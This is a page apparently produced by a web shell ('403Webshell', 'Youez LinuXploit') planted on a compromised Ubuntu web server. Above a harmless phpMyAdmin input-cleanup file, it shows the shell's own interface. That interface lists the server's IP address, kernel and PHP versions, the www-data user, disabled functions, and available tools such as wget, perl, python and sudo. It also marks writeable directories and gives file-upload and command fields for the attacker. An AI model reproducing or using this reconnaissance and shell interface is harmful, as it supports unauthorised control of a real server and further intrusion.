403Webshell
Server IP : 61.19.30.66  /  Your IP : 216.73.216.59
Web Server : Apache/2.2.22 (Ubuntu)
System : Linux klw 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:39:31 UTC 2014 x86_64
User : www-data ( 33)
PHP Version : 5.3.10-1ubuntu3.48
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/phpmyadming/libraries/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/phpmyadming/libraries/cleanup.lib.php
<?php
/* $Id: common.lib.php 9531 2006-10-10 14:06:56Z nijel $ */
// vim: expandtab sw=4 ts=4 sts=4:

/**
 * Functions for cleanup of user input.
 */

/**
 * Removes all variables from request except whitelisted ones.
 *
 * @param string list of variables to allow
 * @return nothing
 * @access public
 * @author  Michal Cihar (michal@cihar.com)
 */
function PMA_remove_request_vars(&$whitelist) {
    // do not check only $_REQUEST because it could have been overwritten
    // and use type casting because the variables could have become
    // strings
    $keys = array_keys(array_merge((array)$_REQUEST, (array)$_GET, (array)$_POST, (array)$_COOKIE));

    foreach($keys as $key) {
        if (!in_array($key, $whitelist)) {
            unset($_REQUEST[$key], $_GET[$key], $_POST[$key], $GLOBALS[$key]);
        } else {
            // allowed stuff could be compromised so escape it
            // we require it to be a string
            if (isset($_REQUEST[$key]) && is_string($_REQUEST[$key])) {
                $_REQUEST[$key] = htmlspecialchars($_REQUEST[$key], ENT_QUOTES);
            } else {
                unset($_REQUEST[$key]);
            }
            if (isset($_POST[$key]) && is_string($_POST[$key])) {
                $_POST[$key] = htmlspecialchars($_POST[$key], ENT_QUOTES);
            } else {
                unset($_POST[$key]);
            }
            if (isset($_COOKIE[$key]) && is_string($_COOKIE[$key])) {
                $_COOKIE[$key] = htmlspecialchars($_COOKIE[$key], ENT_QUOTES);
            } else {
                unset($_COOKIE[$key]);
            }
            if (isset($_GET[$key]) && is_string($_GET[$key])) {
                $_GET[$key] = htmlspecialchars($_GET[$key], ENT_QUOTES);
            } else {
                unset($_GET[$key]);
            }
        }
    }
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit